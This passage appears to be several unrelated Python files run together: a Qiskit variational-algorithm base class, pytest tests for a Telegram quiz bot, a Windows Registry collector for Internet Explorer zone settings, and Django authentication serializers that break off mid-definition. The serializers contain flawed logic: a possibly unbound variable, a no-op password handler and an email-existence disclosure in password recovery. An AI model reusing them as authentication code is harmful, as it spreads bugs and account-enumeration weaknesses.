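``QuantumCircuit``, ``SLSQP`` and ``np`` refer to this module's own imports)::

    from qiskit.circuit import Parameter

    class SketchVQA(VariationalAlgorithm):
        # Toy subclass: minimizes a classical quadratic over the ansatz parameters.
        def get_optimal_cost(self): raise NotImplementedError()
        def get_optimal_circuit(self): raise NotImplementedError()
        def get_optimal_vector(self): raise NotImplementedError()
        @property
        def optimal_params(self): raise NotImplementedError()

    theta = Parameter("theta")
    ansatz = QuantumCircuit(1)
    ansatz.ry(theta, 0)          # any parameterized circuit can serve as the ansatz

    algo = SketchVQA(ansatz=ansatz, optimizer=SLSQP())
    result = algo.find_minimum(cost_fn=lambda p: float(np.sum((p - 0.5) ** 2)))
    # result.optimal_point holds the parameter vector that minimized cost_fn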
""" from typing import Optional, Callable, Union, Dict import time import logging from abc import abstractmethod import numpy as np from qiskit.circuit import QuantumCircuit from qiskit.providers import BaseBackend from qiskit.providers import Backend from qiskit.opflow.gradients import GradientBase from qiskit.utils import QuantumInstance, algorithm_globals from .algorithm_result import AlgorithmResult from .optimizers import Optimizer, SLSQP logger = logging.getLogger(__name__) class VariationalAlgorithm: """The Variational Algorithm Base Class.""" def __init__( self, ansatz: QuantumCircuit, optimizer: Optimizer, cost_fn: Optional[Callable] = None, gradient: Optional[Union[GradientBase, Callable]] = None, initial_point: Optional[np.ndarray] = None, quantum_instance: Optional[Union[QuantumInstance, BaseBackend, Backend]] = None, ) -> None: """ Args: ansatz: An optional parameterized ansatz (a.k.a. variational form). optimizer: A classical optimizer. cost_fn: An optional cost function for optimizer. If not supplied here must be supplied on :meth:`find_minimum`. gradient: An optional gradient operator or function for optimizer. initial_point: An optional initial point (i.e. initial parameter values) for the optimizer. quantum_instance: Quantum Instance or Backend Raises: ValueError: for invalid input """ self._quantum_instance = None if quantum_instance: self.quantum_instance = quantum_instance if optimizer is None: logger.info("No optimizer provided, setting it to SLSPQ.") optimizer = SLSQP() self._optimizer = optimizer self._gradient = gradient self._cost_fn = cost_fn self._initial_point = initial_point self._ansatz = ansatz self._ansatz_params = None if ansatz is not None: self.ansatz = ansatz self._parameterized_circuits = None @property def quantum_instance(self) -> Optional[QuantumInstance]: """Returns quantum instance.""" return self._quantum_instance @quantum_instance.setter def quantum_instance( self, quantum_instance: Union[QuantumInstance, BaseBackend, Backend] ) -> None: """Sets quantum instance.""" if isinstance(quantum_instance, (BaseBackend, Backend)): quantum_instance = QuantumInstance(quantum_instance) self._quantum_instance = quantum_instance @property def ansatz(self) -> Optional[QuantumCircuit]: """Returns the ansatz""" return self._ansatz @ansatz.setter def ansatz(self, ansatz: Optional[QuantumCircuit]): """Sets the ansatz""" if isinstance(ansatz, QuantumCircuit): # store the parameters self._ansatz_params = sorted(ansatz.parameters, key=lambda p: p.name) self._ansatz = ansatz elif ansatz is None: self._ansatz_params = None self._ansatz = ansatz else: raise ValueError('Unsupported type "{}" of ansatz'.format(type(ansatz))) @property def optimizer(self) -> Optional[Optimizer]: """Returns optimizer""" return self._optimizer @optimizer.setter def optimizer(self, optimizer: Optimizer): """Sets optimizer""" self._optimizer = optimizer @property def initial_point(self) -> Optional[np.ndarray]: """Returns initial point""" return self._initial_point @initial_point.setter def initial_point(self, initial_point: np.ndarray): """Sets initial point""" self._initial_point = initial_point def find_minimum( self, initial_point: Optional[np.ndarray] = None, ansatz: Optional[QuantumCircuit] = None, cost_fn: Optional[Callable] = None, optimizer: Optional[Optimizer] = None, gradient_fn: Optional[Callable] = None, ) -> "VariationalResult": """Optimize to find the minimum cost value. Args: initial_point: If not `None` will be used instead of any initial point supplied via constructor. 
If `None` and `None` was supplied to constructor then a random point will be used if the optimizer requires an initial point. ansatz: If not `None` will be used instead of any ansatz supplied via constructor. cost_fn: If not `None` will be used instead of any cost_fn supplied via constructor. optimizer: If not `None` will be used instead of any optimizer supplied via constructor. gradient_fn: Optional gradient function for optimizer Returns: dict: Optimized variational parameters, and corresponding minimum cost value. Raises: ValueError: invalid input """ initial_point = initial_point if initial_point is not None else self.initial_point ansatz = ansatz if ansatz is not None else self.ansatz cost_fn = cost_fn if cost_fn is not None else self._cost_fn optimizer = optimizer if optimizer is not None else self.optimizer if ansatz is None: raise ValueError("Ansatz neither supplied to constructor nor find minimum.") if cost_fn is None: raise ValueError("Cost function neither supplied to constructor nor find minimum.") if optimizer is None: raise ValueError("Optimizer neither supplied to constructor nor find minimum.") nparms = ansatz.num_parameters if hasattr(ansatz, "parameter_bounds") and ansatz.parameter_bounds is not None: bounds = ansatz.parameter_bounds else: bounds = [(None, None)] * nparms if initial_point is not None and len(initial_point) != nparms: raise ValueError( "Initial point size {} and parameter size {} mismatch".format( len(initial_point), nparms ) ) if len(bounds) != nparms: raise ValueError("Ansatz bounds size does not match parameter size") # If *any* value is *equal* in bounds array to None then the problem does *not* have bounds problem_has_bounds = not np.any(np.equal(bounds, None)) # Check capabilities of the optimizer if problem_has_bounds: if not optimizer.is_bounds_supported: raise ValueError("Problem has bounds but optimizer does not support bounds") else: if optimizer.is_bounds_required: raise ValueError("Problem does not have bounds but optimizer requires bounds") if initial_point is not None: if not optimizer.is_initial_point_supported: raise ValueError("Optimizer does not support initial point") else: if optimizer.is_initial_point_required: if hasattr(ansatz, "preferred_init_points"): # Note: default implementation returns None, hence check again after below initial_point = ansatz.preferred_init_points if initial_point is None: # If still None use a random generated point low = [(l if l is not None else -2 * np.pi) for (l, u) in bounds] high = [(u if u is not None else 2 * np.pi) for (l, u) in bounds] initial_point = algorithm_globals.random.uniform(low, high) start = time.time() if not optimizer.is_gradient_supported: # ignore the passed gradient function gradient_fn = None else: if not gradient_fn: gradient_fn = self._gradient logger.info("Starting optimizer.\nbounds=%s\ninitial point=%s", bounds, initial_point) opt_params, opt_val, num_optimizer_evals = optimizer.optimize( nparms, cost_fn, variable_bounds=bounds, initial_point=initial_point, gradient_function=gradient_fn, ) eval_time = time.time() - start result = VariationalResult() result.optimizer_evals = num_optimizer_evals result.optimizer_time = eval_time result.optimal_value = opt_val result.optimal_point = opt_params result.optimal_parameters = dict(zip(self._ansatz_params, opt_params)) return result def get_prob_vector_for_params( self, construct_circuit_fn, params_s, quantum_instance, construct_circuit_args=None ): """Helper function to get probability vectors for a set of params""" circuits = [] for 
params in params_s: circuit = construct_circuit_fn(params, **construct_circuit_args) circuits.append(circuit) results = quantum_instance.execute(circuits) probs_s = [] for circuit in circuits: if quantum_instance.is_statevector: sv = results.get_statevector(circuit) probs = np.real(sv * np.conj(sv)) probs_s.append(probs) else: counts = results.get_counts(circuit) probs_s.append(self.get_probabilities_for_counts(counts)) return np.array(probs_s) def get_probabilities_for_counts(self, counts): """get probabilities for counts""" shots = sum(counts.values()) states = int(2 ** len(list(counts.keys())[0])) probs = np.zeros(states) for k, v in counts.items(): probs[int(k, 2)] = v / shots return probs @abstractmethod def get_optimal_cost(self): """get optimal cost""" raise NotImplementedError() @abstractmethod def get_optimal_circuit(self): """get optimal circuit""" raise NotImplementedError() @abstractmethod def get_optimal_vector(self): """get optimal vector""" raise NotImplementedError() @property @abstractmethod def optimal_params(self): """returns optimal parameters""" raise NotImplementedError() def cleanup_parameterized_circuits(self): """set parameterized circuits to None""" self._parameterized_circuits = None class VariationalResult(AlgorithmResult): """Variation Algorithm Result.""" def __init__(self) -> None: super().__init__() self._optimizer_evals = None self._optimizer_time = None self._optimal_value = None self._optimal_point = None self._optimal_parameters = None @property def optimizer_evals(self) -> Optional[int]: """Returns number of optimizer evaluations""" return self._optimizer_evals @optimizer_evals.setter def optimizer_evals(self, value: int) -> None: """Sets number of optimizer evaluations""" self._optimizer_evals = value @property def optimizer_time(self) -> Optional[float]: """Returns time taken for optimization""" return self._optimizer_time @optimizer_time.setter def optimizer_time(self, value: float) -> None: """Sets time taken for optimization""" self._optimizer_time = value @property def optimal_value(self) -> Optional[float]: """Returns optimal value""" return self._optimal_value @optimal_value.setter def optimal_value(self, value: int) -> None: """Sets optimal value""" self._optimal_value = value @property def optimal_point(self) -> Optional[np.ndarray]: """Returns optimal point""" return self._optimal_point @optimal_point.setter def optimal_point(self, value: np.ndarray) -> None: """Sets optimal point""" self._optimal_point = value @property def optimal_parameters(self) -> Optional[Dict]: """Returns the optimal parameters in a dictionary""" return self._optimal_parameters @optimal_parameters.setter def optimal_parameters(self, value: Dict) -> None: """Sets optimal parameters""" self._optimal_parameters = value from datetime import timedelta from gatebot.bot import GateBot from gatebot.questions import Question from .utils import UserSession QUESTION_1 = Question( text="Test question #1", options=[ "Test option 1.1", "Test option 1.2", "Test option 1.3", ], answer=0, ) QUESTION_2 = Question( text="Test question #2", options=[ "Test option 2.1", "Test option 2.2", "Test option 2.3", "Test option 2.4", ], answer=3, ) QUESTION_3 = Question( text="Test question #3", options=[ "Test option 3.1", "Test option 3.2", "Test option 3.3", "Test option 3.4", "Test option 3.5", ], answer=1, ) def test_user_joins(gatebot: GateBot): session = UserSession(gatebot) session.play_joins_group() session.assert_was_restricted() def test_user_sends_start(gatebot: GateBot): session = 
UserSession(gatebot) session.play_sends_command("start") session.assert_sent_getting_started() def test_user_sends_start_in_group(gatebot: GateBot): session = UserSession(gatebot) session.play_sends_command_group("start") session.assert_no_api_calls() def test_user_starts_quiz(gatebot: GateBot): session = UserSession(gatebot, force_questions=[ QUESTION_1, QUESTION_2, QUESTION_3, ]) session.play_sends_callback_query(1, "start_quiz") session.assert_question_displayed(1, QUESTION_1, pos=1) def test_user_starts_quiz_twice(gatebot: GateBot): session = UserSession(gatebot, force_questions=[ QUESTION_1, QUESTION_2, QUESTION_3, ]) session.play_sends_callback_query(1, "start_quiz") session.assert_question_displayed(1, QUESTION_1, pos=1) session.play_sends_callback_query(1, "answer_0") session.assert_question_displayed( 1, QUESTION_1, pos=1, answered='correct') # Quiz is not recreated session.play_sends_callback_query(2, "start_quiz") session.assert_question_displayed( 2, QUESTION_1, pos=1, answered='correct') def test_navigation(gatebot: GateBot): session = UserSession(gatebot, force_questions=[ QUESTION_1, QUESTION_2, QUESTION_3, ]) session.play_sends_callback_query(1, "start_quiz") session.assert_question_displayed(1, QUESTION_1, pos=1) session.play_sends_callback_query(1, "next") session.assert_question_displayed(1, QUESTION_2, pos=2) session.play_sends_callback_query(1, "next") session.assert_question_displayed(1, QUESTION_3, pos=3) session.play_sends_callback_query(1, "next") session.assert_question_displayed(1, QUESTION_1, pos=1) session.play_sends_callback_query(1, "prev") session.assert_question_displayed(1, QUESTION_3, pos=3) session.play_sends_callback_query(1, "prev") session.assert_question_displayed(1, QUESTION_2, pos=2) def test_answering_questions(gatebot: GateBot): session = UserSession(gatebot, force_questions=[ QUESTION_1, QUESTION_2, QUESTION_3, ]) session.play_sends_callback_query(1, "start_quiz") session.assert_question_displayed(1, QUESTION_1, pos=1) session.play_sends_callback_query(1, "answer_0") session.assert_question_displayed( 1, QUESTION_1, pos=1, answered='correct') session.play_sends_callback_query(1, "next") session.assert_question_displayed(1, QUESTION_2, pos=2) session.play_sends_callback_query(1, "answer_2") session.assert_question_displayed( 1, QUESTION_2, pos=2, answered='wrong') session.play_sends_callback_query(1, "prev") session.assert_question_displayed( 1, QUESTION_1, pos=1, answered='correct') def test_no_changing_answer(gatebot: GateBot): session = UserSession(gatebot, force_questions=[ QUESTION_1, QUESTION_2, QUESTION_3, ]) session.play_sends_callback_query(1, "start_quiz") session.assert_question_displayed(1, QUESTION_1, pos=1) session.play_sends_callback_query(1, "answer_1") session.assert_question_displayed( 1, QUESTION_1, pos=1, answered='wrong') session.play_sends_callback_query(1, "answer_0") session.assert_question_displayed( 1, QUESTION_1, pos=1, answered='wrong') def test_joins_and_passes(gatebot: GateBot): session = UserSession(gatebot, force_questions=[ QUESTION_1, QUESTION_2, QUESTION_3, ]) session.play_joins_group() session.play_sends_callback_query(1, "start_quiz") session.play_sends_callback_query(1, "answer_0") # Correct session.play_sends_callback_query(1, "next") session.play_sends_callback_query(1, "answer_3") # Correct session.play_sends_callback_query(1, "next") session.play_sends_callback_query(1, "answer_2") # Wrong session.assert_sent_passed(result=2) session.assert_was_unrestricted() def test_passes_and_shares_result(gatebot: 
GateBot): session = UserSession(gatebot, force_questions=[ QUESTION_1, QUESTION_2, QUESTION_3, ]) session.play_joins_group() session.play_sends_callback_query(1, "start_quiz") session.play_sends_callback_query(1, "answer_0") # Correct session.play_sends_callback_query(1, "next") session.play_sends_callback_query(1, "answer_3") # Correct session.play_sends_callback_query(1, "next") session.play_sends_callback_query(1, "answer_2") # Wrong session.assert_sent_passed(result=2) session.play_sends_callback_query(2, "share_result") session.assert_sent_results(result=2) # Can't share the result multiple times session.play_sends_callback_query(2, "share_result") session.assert_no_messages_sent() def test_passes_and_joins(gatebot: GateBot): session = UserSession(gatebot, force_questions=[ QUESTION_1, QUESTION_2, QUESTION_3, ]) session.play_sends_callback_query(1, "start_quiz") session.play_sends_callback_query(1, "answer_0") # Correct session.play_sends_callback_query(1, "next") session.play_sends_callback_query(1, "answer_3") # Correct session.play_sends_callback_query(1, "next") session.play_sends_callback_query(1, "answer_1") # Correct session.assert_sent_passed(result=3) session.assert_was_unrestricted() session.play_joins_group() session.assert_no_restriction_api_calls() def test_starts_quiz_and_joins(gatebot: GateBot): session = UserSession(gatebot, force_questions=[ QUESTION_1, QUESTION_2, QUESTION_3, ]) session.play_sends_callback_query(1, "start_quiz") session.play_sends_callback_query(1, "answer_0") # Correct session.play_joins_group() session.assert_was_restricted() def test_fails(gatebot: GateBot): session = UserSession(gatebot, force_questions=[ QUESTION_1, QUESTION_2, QUESTION_3, ]) session.play_sends_callback_query(1, "start_quiz") session.play_sends_callback_query(1, "answer_1") # Wrong session.play_sends_callback_query(1, "next") session.play_sends_callback_query(1, "answer_2") # Wrong session.play_sends_callback_query(1, "next") session.play_sends_callback_query(1, "answer_1") # Correct session.assert_sent_failed(result=1) session.assert_no_restriction_api_calls() def test_passes_and_sends_start(gatebot: GateBot): session = UserSession(gatebot, force_questions=[ QUESTION_1, QUESTION_2, QUESTION_3, ]) # Pass the test session.play_sends_callback_query(1, "start_quiz") session.play_sends_callback_query(1, "answer_0") # Correct session.play_sends_callback_query(1, "next") session.play_sends_callback_query(1, "answer_3") # Correct session.play_sends_callback_query(1, "next") session.play_sends_callback_query(1, "answer_1") # Correct session.play_sends_command("start") session.assert_sent_passed(result=3) def test_fails_and_sends_start(gatebot: GateBot): session = UserSession(gatebot, force_questions=[ QUESTION_1, QUESTION_2, QUESTION_3, ]) # Pass the test session.play_sends_callback_query(1, "start_quiz") session.play_sends_callback_query(1, "answer_1") # Wrong session.play_sends_callback_query(1, "next") session.play_sends_callback_query(1, "answer_2") # Wrong session.play_sends_callback_query(1, "next") session.play_sends_callback_query(1, "answer_2") # Wrong session.play_sends_command("start") session.assert_sent_failed(result=0) def test_fails_and_restarts(gatebot: GateBot): session = UserSession(gatebot, force_questions=[ QUESTION_1, QUESTION_2, QUESTION_3, ]) session.play_sends_callback_query(1, "start_quiz") session.play_sends_callback_query(1, "answer_1") # Wrong session.play_sends_callback_query(1, "next") session.play_sends_callback_query(1, "answer_2") # Wrong 
session.play_sends_callback_query(1, "next") session.play_sends_callback_query(1, "answer_2") # Wrong session.force_questions = [ QUESTION_3, QUESTION_2, QUESTION_1, ] session.play_time_passed(timedelta(hours=73)) session.play_sends_command("start") session.assert_sent_getting_started() session.play_sends_callback_query(2, "start_quiz") session.assert_question_displayed( 2, QUESTION_3, pos=1) def test_fails_and_restarts_too_soon(gatebot: GateBot): session = UserSession(gatebot, force_questions=[ QUESTION_1, QUESTION_2, QUESTION_3, ]) session.play_sends_callback_query(1, "start_quiz") session.play_sends_callback_query(1, "answer_1") # Wrong session.play_sends_callback_query(1, "next") session.play_sends_callback_query(1, "answer_2") # Wrong session.play_sends_callback_query(1, "next") # Let some time pass before the last answer to make sure user waits # after the last answer not after the quiz was started. session.play_time_passed(timedelta(hours=30)) session.play_sends_callback_query(1, "answer_2") # Wrong session.play_time_passed(timedelta(hours=70)) session.play_sends_command("start") session.assert_sent_failed(result=0, wait_hours=2) # -*- coding: utf-8 -*- """Microsoft Internet Explorer (MSIE) zone information collector.""" from __future__ import print_function from __future__ import unicode_literals from winregrc import interface DEFAULT_ZONE_NAMES = { '0': 'My Computer', '1': 'Local Intranet Zone', '2': 'Trusted sites Zone', '3': 'Internet Zone', '4': 'Restricted Sites Zone', } # Sources: # http://support.microsoft.com/kb/182569 # http://technet.microsoft.com/en-us/library/cc783259(v=ws.10).aspx CONTROL_DESCRIPTIONS = { '1001': 'Download signed ActiveX controls', '1004': 'Download unsigned ActiveX controls', '1200': 'Run ActiveX controls and plug-ins', '1201': ('Initialize and script ActiveX controls not marked as safe for ' 'scripting'), '1206': 'Allow scripting of Internet Explorer Web browser control', '1207': 'Reserved', '1208': 'Allow previously unused ActiveX controls to run without prompt', '1209': 'Allow Scriptlets', '120A': 'Override Per-Site (domain-based) ActiveX restrictions', '120B': 'Override Per-Site (domain-based) ActiveX restrictions', '1400': 'Active scripting', '1402': 'Scripting of Java applets', '1405': 'Script ActiveX controls marked as safe for scripting', '1406': 'Access data sources across domains', '1407': 'Allow Programmatic clipboard access', '1408': 'Reserved', '1601': 'Submit non-encrypted form data', '1604': 'Font download', '1605': 'Run Java', '1606': 'Userdata persistence', '1607': 'Navigate sub-frames across different domains', '1608': 'Allow META REFRESH', '1609': 'Display mixed content', '160A': 'Include local directory path when uploading files to a server', '1800': 'Installation of desktop items', '1802': 'Drag and drop or copy and paste files', '1803': 'File Download', '1804': 'Launching programs and files in an IFRAME', '1805': 'Launching programs and files in webview', '1806': 'Launching applications and unsafe files', '1807': 'Reserved', '1808': 'Reserved', '1809': 'Use Pop-up Blocker', '180A': 'Reserved', '180B': 'Reserved', '180C': 'Reserved', '180D': 'Reserved', '1A00': 'Logon', '1A02': 'Allow persistent cookies that are stored on your computer', '1A03': 'Allow per-session cookies (not stored)', '1A04': ('Don\'t prompt for client certificate selection when no ' 'certificates or only one certificate exists'), '1A05': 'Allow 3rd party persistent cookies', '1A06': 'Allow 3rd party session cookies', '1A10': 'Privacy Settings', '1C00': 'Java 
permissions', '1E05': 'Software channel permissions', '1F00': 'Reserved', '2000': 'Binary and script behaviors', '2001': 'Run components signed with Authenticode', '2004': 'Run components not signed with Authenticode', '2100': 'Open files based on content, not file extension', '2101': ('Web sites in less privileged web content zone can navigate into ' 'this zone'), '2102': ('Allow script initiated windows without size or position ' 'constraints'), '2103': 'Allow status bar updates via script', '2104': 'Allow websites to open windows without address or status bars', '2105': 'Allow websites to prompt for information using scripted windows', '2200': 'Automatic prompting for file downloads', '2201': 'Automatic prompting for ActiveX controls', '2300': 'Allow web pages to use restricted protocols for active content', '2301': 'Use Phishing Filter', '2400': '.NET Framework: XAML browser applications', '2401': '.NET Framework: XPS documents', '2402': '.NET Framework: Loose XAML', '2500': 'Turn on Protected Mode [Vista only setting]', '2600': 'Enable .NET Framework setup', } CONTROL_VALUES_COMMON_ENABLE = { 0x00000000: 'Enable', 0x00000001: 'Prompt', 0x00000003: 'Disable', 0x00010000: 'Administrator approved', } CONTROL_VALUES_COMMON_SAFETY = { 0x00010000: 'High safety', 0x00020000: 'Medium safety', 0x00030000: 'Low safety', } CONTROL_VALUES_1A00 = { 0x00000000: 'Automatic logon with current user name and password', 0x00010000: 'Prompt for user name and password', 0x00020000: 'Automatic logon only in Intranet zone', 0x00030000: 'Anonymous logon', } CONTROL_VALUES_1C00 = { 0x00000000: 'Disable Java', 0x00010000: 'High safety', 0x00020000: 'Medium safety', 0x00030000: 'Low safety', 0x00800000: 'Custom', } class MSIEZoneInfoCollector(interface.WindowsRegistryKeyCollector): """MSIE zone information collector.""" def _PrintLockdownKey(self, registry, lockdown_key_path): """Prints a lockdown key. Args: registry (dfwinreg.WinRegistry): Windows Registry. lockdown_key_path (str): lockdown Registry key path. """ lockdown_key = registry.GetKeyByPath(lockdown_key_path) if not lockdown_key: return if self._debug: print('Key: {0:s}'.format(lockdown_key_path)) print('') program_name = 'iexplore.exe' program_value = lockdown_key.GetValueByName(program_name) if program_value: value = program_value.GetDataAsObject() else: value = 0 if self._debug: if value == 1: print('Local Machine lockdown for {0:s}: True'.format(program_name)) else: print('Local Machine lockdown for {0:s}: False'.format(program_name)) print('') def _PrintZonesKey(self, registry, zones_key_path, output_mode=0): """Prints a zones key. Args: registry (dfwinreg.WinRegistry): Windows Registry. zones_key_path (str): zones Registry key path. output_mode (Optional[int]): output mode. """ zones_key = registry.GetKeyByPath(zones_key_path) if not zones_key: return if self._debug: print('Key: {0:s}'.format(zones_key_path)) print('') for zone_key in zones_key.GetSubkeys(): # TODO: the zone names are defined in another key. 
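# Editor's note -- short illustrative aside; the per-zone loop continues
# directly below.  The module-level tables above are what turn a raw registry
# DWORD into a readable policy line.  For example (names taken from the
# dictionaries defined in this file):
#
#   name, data = '1400', 0x00000003
#   description = CONTROL_DESCRIPTIONS.get(name, name)
#   setting = CONTROL_VALUES_COMMON_ENABLE.get(data, '')
#   # -> 'Active scripting', 'Disable'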
if zone_key.name in DEFAULT_ZONE_NAMES: if self._debug: print('Zone: {0:s}: {1:s}'.format( zone_key.name, DEFAULT_ZONE_NAMES[zone_key.name])) else: if self._debug: print('Zone: {0:s}'.format(zone_key.name)) for setting_value in zone_key.GetValues(): if not setting_value.name: continue elif setting_value.name in [ 'Description', 'DisplayName', 'PMDisplayName']: if output_mode == 0: if self._debug: print('{0:s}: {1:s}'.format( setting_value.name, setting_value.GetDataAsObject())) elif len(setting_value.name) == 4 and setting_value.name != 'Icon': if len(setting_value.data) != 4: if output_mode == 0: if self._debug: print('Value: {0:s}'.format(setting_value.data.encode('hex'))) else: value = setting_value.GetDataAsObject() value_desc = '' if setting_value.name in [ '1001', '1004', '1200', '1201', '1400', '1402', '1405', '1406', '1407', '1601', '1604', '1606', '1607', '1608', '1609', '1800', '1802', '1803', '1804', '1809', '1A04', '2000', '2001', '2004', '2100', '2101', '2102', '2200', '2201', '2300']: value_desc = CONTROL_VALUES_COMMON_ENABLE.get(value, '') elif setting_value.name == '1A00': value_desc = CONTROL_VALUES_1A00.get(value, '') elif setting_value.name == '1C00': value_desc = CONTROL_VALUES_1C00.get(value, '') elif setting_value.name == '1E05': value_desc = CONTROL_VALUES_COMMON_SAFETY.get(value, '') if output_mode == 0: if setting_value.name in CONTROL_DESCRIPTIONS: if self._debug: print('Control: {0:s}: {1:s}'.format( setting_value.name, CONTROL_DESCRIPTIONS[setting_value.name])) else: if self._debug: print('Control: {0:s}'.format(setting_value.name)) if value_desc: if self._debug: print('Data: 0x{0:08x}: {1:s}'.format(value, value_desc)) else: if self._debug: print('Data: 0x{0:08x}'.format(value)) elif output_mode == 1: if setting_value.name in CONTROL_DESCRIPTIONS: control_desc = CONTROL_DESCRIPTIONS[setting_value.name] else: control_desc = '' if self._debug: print('{0:s}\t0x{1:08x}\t{2:s}\t{3:s}'.format( setting_value.name, value, value_desc, control_desc)) else: if output_mode == 0: if self._debug: print('Value: {0:s}'.format(setting_value.name)) if self._debug: print('') def Collect(self, registry, output_writer): """Collects the MSIE zone information. Args: registry (dfwinreg.WinRegistry): Windows Registry. output_writer (OutputWriter): output writer. Returns: bool: True if the MSIE zone information key was found, False if not. 
""" result = False output_mode = 1 # TODO: pass output_writer _ = output_writer # HKEY_CURRENT_USER key_path = ( 'HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Internet Explorer\\' 'Main\\FeatureControl\\FEATURE_LOCALMACHINE_LOCKDOWN') self._PrintLockdownKey(registry, key_path) key_path = ( 'HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\' 'FeatureControl\\FEATURE_LOCALMACHINE_LOCKDOWN') self._PrintLockdownKey(registry, key_path) # HKEY_LOCAL_MACHINE key_path = ( 'HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\' 'Internet Explorer\\Main\\FeatureControl\\' 'FEATURE_LOCALMACHINE_LOCKDOWN') self._PrintLockdownKey(registry, key_path) key_path = ( 'HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Internet Explorer\\Main\\' 'FeatureControl\\FEATURE_LOCALMACHINE_LOCKDOWN') self._PrintLockdownKey(registry, key_path) # HKEY_LOCAL_MACHINE WoW64 key_path = ( 'HKEY_LOCAL_MACHINE\\Software\\Wow6432Node\\Policies\\Microsoft\\' 'Internet Explorer\\Main\\FeatureControl\\' 'FEATURE_LOCALMACHINE_LOCKDOWN') self._PrintLockdownKey(registry, key_path) key_path = ( 'HKEY_LOCAL_MACHINE\\Software\\Wow6432Node\\Microsoft\\' 'Internet Explorer\\Main\\FeatureControl\\' 'FEATURE_LOCALMACHINE_LOCKDOWN') self._PrintLockdownKey(registry, key_path) # TODO: check for value Policies\\Microsoft\\Windows\\CurrentVersion\\ # Internet Settings\\Security_HKEY_LOCAL_MACHINE_only and its data # if not exists or 0, not enabled if 1 only HKLM policy applies # HKEY_CURRENT_USER key_path = ( 'HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\' 'CurrentVersion\\Internet Settings\\Zones') self._PrintZonesKey(registry, key_path, output_mode=output_mode) key_path = ( 'HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\' 'CurrentVersion\\Internet Settings\\Lockdown_Zones') self._PrintZonesKey(registry, key_path, output_mode=output_mode) key_path = ( 'HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\' 'Internet Settings\\Zones') self._PrintZonesKey(registry, key_path, output_mode=output_mode) key_path = ( 'HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\' 'Internet Settings\\Lockdown_Zones') self._PrintZonesKey(registry, key_path, output_mode=output_mode) # HKEY_LOCAL_MACHINE key_path = ( 'HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\' 'CurrentVersion\\Internet Settings\\Zones') self._PrintZonesKey(registry, key_path, output_mode=output_mode) key_path = ( 'HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows\\' 'CurrentVersion\\Internet Settings\\Lockdown_Zones') self._PrintZonesKey(registry, key_path, output_mode=output_mode) key_path = ( 'HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\' 'Internet Settings\\Zones') self._PrintZonesKey(registry, key_path, output_mode=output_mode) key_path = ( 'HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\' 'Internet Settings\\Lockdown_Zones') self._PrintZonesKey(registry, key_path, output_mode=output_mode) # HKEY_LOCAL_MACHINE WoW64 key_path = ( 'HKEY_LOCAL_MACHINE\\Software\\Wow6432Node\\Policies\\Microsoft\\' 'Windows\\CurrentVersion\\Internet Settings\\Zones') self._PrintZonesKey(registry, key_path, output_mode=output_mode) key_path = ( 'HKEY_LOCAL_MACHINE\\Software\\Wow6432Node\\Policies\\Microsoft\\' 'Windows\\CurrentVersion\\Internet Settings\\Lockdown_Zones') self._PrintZonesKey(registry, key_path, output_mode=output_mode) key_path = ( 'HKEY_LOCAL_MACHINE\\Software\\Wow6432Node\\Microsoft\\Windows\\' 'CurrentVersion\\Internet Settings\\Zones') self._PrintZonesKey(registry, 
key_path, output_mode=output_mode) key_path = ( 'HKEY_LOCAL_MACHINE\\Software\\Wow6432Node\\Microsoft\\Windows\\' 'CurrentVersion\\Internet Settings\\Lockdown_Zones') self._PrintZonesKey(registry, key_path, output_mode=output_mode) return result api/authentication/serializers.py from django.contrib.auth.password_validation import validate_password from rest_framework import serializers from django.contrib.auth import get_user_model from django.db.models import Q from rest_framework.response import Response from authentication.models import (Student, Teacher, Faculty, Profession, ACAD_GROUPS_CHOICES) User = get_user_model() class FacultySerializer(serializers.ModelSerializer): class Meta(object): model = Faculty fields = ('name',) class ProfessionSerializer(serializers.ModelSerializer): class Meta(object): model = Profession fields = ('name',) class CreateUserSerializer(serializers.ModelSerializer): read_only_fields = ('date_joined',) class Meta(object): model = User fields = ( 'email', 'password', ) def create(self, validated_data): validate_password(password=validated_data.get('password',), user=validated_data.get('email'), password_validators=None) email = validated_data.get('email'); user = User.objects.create_user(**validated_data, user_type=3) user.send_mail(email=email) return user class RecoverySerializer(serializers.ModelSerializer): email = serializers.CharField(max_length=64) class Meta(object): model = User fields = ('email',) def post(self, data): email = data.get('email', None) user = User.objects.filter(Q(email=email)).distinct() if user.exists() and user.count() == 1: user_obj = user.first() user_obj.send_recovery_password(email=email) else: raise serializers.ValidationError("This email is not valid") if user_obj: if not user_obj.is_active: raise serializers.ValidationError("User not active") return data class VerifyUserSerializer(serializers.ModelSerializer): class Meta(object): model = User fields = ('code',) class VerifyUserPassSerializer(serializers.ModelSerializer): password = serializers.CharField(max_length=64) class Meta(object): model = User fields = ('code', 'password',) def post(self, data, code): user = User.objects.get(code=code) class DeleteUserSerializer(serializers.ModelSerializer): class Meta(object): model = User fields = ('email', 'password',) def delete(self, request, pk=None, **kwargs): request.user.is_active = False request.user.save() return Response(status=204) class TeacherSerializer(serializers.ModelSerializer): faculty = FacultySerializer(many=False) class Meta(object): model = Teacher fields = ( 'user', 'faculty', ) class StudentSerializer(serializers.ModelSerializer): faculty = FacultySerializer(many=False) profession = ProfessionSerializer(many=False) acad_group = ACAD_GROUPS_CHOICES class Meta(object): model = Student fields = ( 'user', 'faculty', 'profession', 'acad_group', ) class FindUserSerializer(serializers.ModelSerializer): date_joined = serializers.ReadOnlyField() email = serializers.ReadOnlyField() student = StudentSerializer(many=False, read_only=True) teacher = TeacherSerializer(many=False, read_only=True) class Meta(object): model = User fields = ( 'id', 'email', 'first_name', 'last_name', 'patronymic', 'bio', 'avatar', 'date_of_birth', 'date_joined', 'last_update', 'news_subscription', 'is_moderator', 'is_active', 'is_admin', 'is_student', 'is_teacher', 'student', 'teacher', ) class 